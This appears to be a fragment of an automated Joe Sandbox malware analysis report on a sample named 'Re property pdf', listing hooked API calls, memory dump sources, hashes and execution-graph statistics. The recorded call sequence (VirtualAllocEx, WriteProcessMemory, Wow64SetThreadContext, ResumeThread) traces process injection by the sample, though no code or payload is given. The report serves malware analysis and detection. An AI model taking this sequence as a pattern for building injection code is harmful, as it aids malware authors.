                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07724596
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07724B48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07724B48
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07724C28
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0130D656,?,?,?,?,?), ref: 0130D717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07724596
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07724C28
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0130D656,?,?,?,?,?), ref: 0130D717
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07724A66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,07503402,?,?,?,?,?), ref: 075034A7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795524867.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 074F0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.1795495475.00000000074F0000.00000004.08000000.00040000.00000000.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_74f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07724A66
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: 9e98a5286058f70f0a2b81fae39a08f9f1fe064ca6eafd45a2d4419e0c142bb2
                                                                                                                              • Instruction ID: cf2d1359442c0153c75db786ce12fedd4d998059fd091be3a7a91a909eba8424
                                                                                                                              • Opcode Fuzzy Hash: 9e98a5286058f70f0a2b81fae39a08f9f1fe064ca6eafd45a2d4419e0c142bb2
                                                                                                                              • Instruction Fuzzy Hash: F91176B19002898EDB20CFAAC845BEEFFF4AF88320F24885ED559A7240C7759945CF90
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              • Opcode ID: b6be6d2ee0c483b005e47ce3c0b2d00cccd562eb000599c35359130674c2c3ab
                                                                                                                              • Instruction ID: 80d3960766bf0f4c586773060afe96fcf9e6633985f780cba55af5688499fe2a
                                                                                                                              • Opcode Fuzzy Hash: b6be6d2ee0c483b005e47ce3c0b2d00cccd562eb000599c35359130674c2c3ab
                                                                                                                              • Instruction Fuzzy Hash: 1A116AB1D003498FCB20DFAAC4457AEFBF4EF88320F248859D519A7240C775A944CBA0
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0772922D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: ce98e24e9818d5c701ab29885bbe749fe2b1f954ba13d26e06e6432d31aff642
                                                                                                                              • Instruction ID: 45119f1c90588af0c5b2f89908c0a7e25cc90aca675301c0a35dea4e1dfdbc87
                                                                                                                              • Opcode Fuzzy Hash: ce98e24e9818d5c701ab29885bbe749fe2b1f954ba13d26e06e6432d31aff642
                                                                                                                              • Instruction Fuzzy Hash: 621125B58003599FCB10CF99D585BEEBFF4EB48324F248459E519B3210C3B4A545DFA1
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0130AFFE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              • Opcode ID: 2dfe972d7e9deff9440c55093aa7bc3a16d818aad940758a93c9fe964d57cef2
                                                                                                                              • Instruction ID: 6f8301db9e9f161c245a2b553503643ec688b8ea1f6947af93b575c1874eac93
                                                                                                                              • Opcode Fuzzy Hash: 2dfe972d7e9deff9440c55093aa7bc3a16d818aad940758a93c9fe964d57cef2
                                                                                                                              • Instruction Fuzzy Hash: 5B110FB6C003498FDB20CF9AC844B9EFBF4AB88324F14845AD528A7250C3B9A545CFA1
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0772922D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              • Opcode ID: 219d1640dd1dfba17a6f81a8fd50d377ce9b2369b207bd9b91cf9d636a6c39b3
                                                                                                                              • Instruction ID: 36f0a254ee37285c3ac78d864fd5bcd1df6f3d46423f4aca52f7120cf9843414
                                                                                                                              • Opcode Fuzzy Hash: 219d1640dd1dfba17a6f81a8fd50d377ce9b2369b207bd9b91cf9d636a6c39b3
                                                                                                                              • Instruction Fuzzy Hash: FB11F5B58003599FCB10DF9AD585BDEBBF8EB48320F248459E518B7200C375A944CFA1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e1e52b73a27c3b9744b15a1efd12311662a90e77f4e496a6e963aafb298db122
                                                                                                                              • Instruction ID: 14057b4d3217f75f9d62ebec03e574423803cb58b88da18d0814ba3bab9bac3a
                                                                                                                              • Opcode Fuzzy Hash: e1e52b73a27c3b9744b15a1efd12311662a90e77f4e496a6e963aafb298db122
                                                                                                                              • Instruction Fuzzy Hash: B3E108B4E041598FCB14DFA9C5809AEBBB2FF89304F24D169D814AB356D731AD42CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 446a831bf977fc9c23383164ca270513d03329cb4655eb9cc7004ba72e82df11
                                                                                                                              • Instruction ID: 6e3f4b69f5801fc40a6b0c913438892367113561e48264b455d93740493548f3
                                                                                                                              • Opcode Fuzzy Hash: 446a831bf977fc9c23383164ca270513d03329cb4655eb9cc7004ba72e82df11
                                                                                                                              • Instruction Fuzzy Hash: 9EE1E8B4E041698FCB14DFA9C5809AEFBF2BF89344F249169D814AB356D731AD42CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5cd169678074772e570ca522eaf02793ba3c06e779d344b742eae3a465cc3c08
                                                                                                                              • Instruction ID: 30f68641b7ceb38f14a2560e2925a71be64b9d1fef3000b0603ff92bf7a53c83
                                                                                                                              • Opcode Fuzzy Hash: 5cd169678074772e570ca522eaf02793ba3c06e779d344b742eae3a465cc3c08
                                                                                                                              • Instruction Fuzzy Hash: C5E1FBB4E041598FCB14DFA9C9809AEFBB2BF89304F24D169D814AB356D731AD42DF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 53d40c24e64b91622bf0ecb49744b11a6c4f6cea45c54f588ff6cca83c050b21
                                                                                                                              • Instruction ID: 5c901fe7ab1cc2b5114d3cc389f74382bb3cc5f1577ab251b1a9ffeea08198f3
                                                                                                                              • Opcode Fuzzy Hash: 53d40c24e64b91622bf0ecb49744b11a6c4f6cea45c54f588ff6cca83c050b21
                                                                                                                              • Instruction Fuzzy Hash: 17E1FAB4E001698FCB14DFA9C5809AEFBB2BF89305F64D169D814AB356D731AD42CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c943b79bee39216ca02d9d83300869b4579f3b212a8c24e796083e35edfcb6ff
                                                                                                                              • Instruction ID: 5381397de13cf3a55538bca57914a3d2e86134730b9fd29d859c7a865a511491
                                                                                                                              • Opcode Fuzzy Hash: c943b79bee39216ca02d9d83300869b4579f3b212a8c24e796083e35edfcb6ff
                                                                                                                              • Instruction Fuzzy Hash: 82E1EAB5E001598FCB14DFA9C580AAEFBB2BF49304F24D169D814AB356D731AD82DF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 88ede250e484c330a43659957ab4501358c0e06d0a615bd8ac8d1ae3bb2788ac
                                                                                                                              • Instruction ID: 8c8a0f7cc20afd949aa736af7d792026dc09019113d753d19c993e14ebf8e36d
                                                                                                                              • Opcode Fuzzy Hash: 88ede250e484c330a43659957ab4501358c0e06d0a615bd8ac8d1ae3bb2788ac
                                                                                                                              • Instruction Fuzzy Hash: 2DA17232E00219CFCF1ADFB8C85059EBBF6FF85304B15456AE905AB2A5DB31E915CB80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9b6043030245ac5881cc49e7c69782d285c07968d0117a491f39b478fc71faa8
                                                                                                                              • Instruction ID: 2319eef29842c75eaccafd1d3b32114027102cd14b13c3e48e9c769d559de10a
                                                                                                                              • Opcode Fuzzy Hash: 9b6043030245ac5881cc49e7c69782d285c07968d0117a491f39b478fc71faa8
                                                                                                                              • Instruction Fuzzy Hash: 6DC128B1C81B458BD710CF25EA483897BB1BB953A4FB04B09D1617B2E5DBB434AACF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a055932e944947d03dc6d1cff5e2c43def1b9d5ead1074c35d9d14292978a87
                                                                                                                              • Instruction ID: f9629a5d5dffcb9f775b67ab32ced443a60c3415723a9821ac84b5cd077d72c9
                                                                                                                              • Opcode Fuzzy Hash: 5a055932e944947d03dc6d1cff5e2c43def1b9d5ead1074c35d9d14292978a87
                                                                                                                              • Instruction Fuzzy Hash: 3C511CB5E012598FDB14CFA9C5805AEFBF2BF89304F24D169D418AB316D7319A42CF61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 40bdcc8edc766d3569713ad9079d862d591c3d1543d0e93836aa871cfc76f1ca
                                                                                                                              • Instruction ID: 71c7d1d3b353e9a32aaa7e6e60ab92fbe6c445dff8c724ebf9bd86ed7cb21e78
                                                                                                                              • Opcode Fuzzy Hash: 40bdcc8edc766d3569713ad9079d862d591c3d1543d0e93836aa871cfc76f1ca
                                                                                                                              • Instruction Fuzzy Hash: BB511AB1E042598FDB14CFA9C9805AEFBF2BF89304F24D169D418AB256D7319E42CF61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5ba50cd248b00dd18a721c1d6dd59bd1ee02d276df451ae7402538e14b065c0b
                                                                                                                              • Instruction ID: b227dc8ba11c0e2c81e233e67f85a81c6974babb2d2ed745b7aa19c7dbd8855d
                                                                                                                              • Opcode Fuzzy Hash: 5ba50cd248b00dd18a721c1d6dd59bd1ee02d276df451ae7402538e14b065c0b
                                                                                                                              • Instruction Fuzzy Hash: A4511BB5E052598FCB14CFA9C9805AEFBF2BF89304F24C169D418AB356D7319A42CF61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1795597496.0000000007720000.00000040.00000800.00020000.00000000.sdmp, Offset: 07720000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_7720000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9265de122cea7d8b576cb3d1b15f9f3373e3527fe93e3291ca71a44b619e9928
                                                                                                                              • Instruction ID: d10f7d5b93a3566d0f45352b4f84bad49e137b325db9c2485a59beea70ca5e48
                                                                                                                              • Opcode Fuzzy Hash: 9265de122cea7d8b576cb3d1b15f9f3373e3527fe93e3291ca71a44b619e9928
                                                                                                                              • Instruction Fuzzy Hash: 57510AB1E042198FDB14DFA9C5806AEFBF2BF89304F24C16AD458BB216D7319942CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1788930478.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_1300000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5a6f813fe58f475782cfccd6713c290067c801407491b6691ce70586030549a5
                                                                                                                              • Instruction ID: 31728c881c70bd7aeb13aaf48e5c0d20268fb84fd45915bbd42f5861b906874a
                                                                                                                              • Opcode Fuzzy Hash: 5a6f813fe58f475782cfccd6713c290067c801407491b6691ce70586030549a5
                                                                                                                              • Instruction Fuzzy Hash: F5413A764043C19FC378DF38CDCB557BFA8AF413187798A8DD2DADA1A1D2258A51CA90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.1793745865.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_52f0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1031c23f9814deea3077846c6a2e8decf297627ccb2d3f43987c4b7ed6168016
                                                                                                                              • Instruction ID: 8b9bd2a2badf157533e2684e4cf045ca540ffa89b63a29720c2c19a3d7cabe8d
                                                                                                                              • Opcode Fuzzy Hash: 1031c23f9814deea3077846c6a2e8decf297627ccb2d3f43987c4b7ed6168016
                                                                                                                              • Instruction Fuzzy Hash: B9315A2690D3CE15DB23A3B894993CDBFB25F0B018F2C48DECDC0AA593D685805BD345

Execution Graph

Execution Coverage: 1.2%
Dynamic/Decrypted Code Coverage: 5.6%
Signature Coverage: 3.2%
Total number of Nodes: 126
Total number of Limit Nodes: 8

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 728 417483-41749f 729 4174a7-4174ac 728->729 730 4174a2 call 42efa3 728->730 731 4174b2-4174c0 call 42f5a3 729->731 732 4174ae-4174b1 729->732 730->729 735 4174d0-4174e1 call 42d933 731->735 736 4174c2-4174cd call 42f843 731->736 741 4174e3-4174f7 LdrLoadDll 735->741 742 4174fa-4174fd 735->742 736->735 741->742
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004174F5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0
                                                                                                                              • Opcode ID: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                                                                              • Instruction ID: 28b4890146ce45405500527ca045c3249d8b7403630f172c74c7069256cc13f2
                                                                                                                              • Opcode Fuzzy Hash: 335b9d072062c93c8d5841efebb952b058b4076accb46d6834c6a2a97a5bff61
                                                                                                                              • Instruction Fuzzy Hash: 64011EB5E4020DBBDF10DAE5DC42FDEB7789B54308F4081AAE90897241F635EB588B95

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 753 42c233-42c26f call 404693 call 42d453 NtClose
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C26A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2171525341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_400000_Re property pdf.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: e2b4365f338ebfd7809c8d1bc070f32a336d522b612cb9306e0a8c1fccd46b62
                                                                                                                              • Instruction ID: b0720475a24e4fb921e2fcb4d3bcce76bf947cad237faf3740dd50ce58ed5a96
                                                                                                                              • Opcode Fuzzy Hash: e2b4365f338ebfd7809c8d1bc070f32a336d522b612cb9306e0a8c1fccd46b62
                                                                                                                              • Instruction Fuzzy Hash: B3E086316043147BD610FA5ADC42F9B776CEFC5754F408419FA0C67241DA75790187F4
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 0d7f3c7c3df33d502e8a8725b4c6434a1072e2127b2afa4e2ac71ca786637d48
                                                                                                                              • Instruction ID: 943e43e531f6ae574a5d62bd93a9e543ea513a29bf4b0a102d4de3bd96b442e4
                                                                                                                              • Opcode Fuzzy Hash: 0d7f3c7c3df33d502e8a8725b4c6434a1072e2127b2afa4e2ac71ca786637d48
                                                                                                                              • Instruction Fuzzy Hash: 6490026120240003524571598414617400A97E0201B55C022F9414590DC5258D916625
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 89d55e39f9c2026276ac106a818a6c0ae6951a7f7069f8b2d03631b79b9080d4
                                                                                                                              • Instruction ID: f8a3217b10e772ebab4bd2e79d2b7d4504856353885981b4bbe7b1e803916f72
                                                                                                                              • Opcode Fuzzy Hash: 89d55e39f9c2026276ac106a818a6c0ae6951a7f7069f8b2d03631b79b9080d4
                                                                                                                              • Instruction Fuzzy Hash: 4190023120140413E25171598504707000997D0241F95C413B8824558DD6568E52A621
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000006.00000002.2172585991.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_6_2_fd0000_Re property pdf.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: 6419f5929cc397fef4c7a7fe13706da39086db5941bc7d6ca941be905dc5744f
                                                                                                                              • Instruction ID: 9008c73ef24a6ab6e22552bca4f7e4dc73aa1c7191754d580e62e8200a0bbab4
                                                                                                                              • Opcode Fuzzy Hash: 6419f5929cc397fef4c7a7fe13706da39086db5941bc7d6ca941be905dc5744f
                                                                                                                              • Instruction Fuzzy Hash: F790023120148802E2507159C40474B000597D0301F59C412BC824658DC6958D917621
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
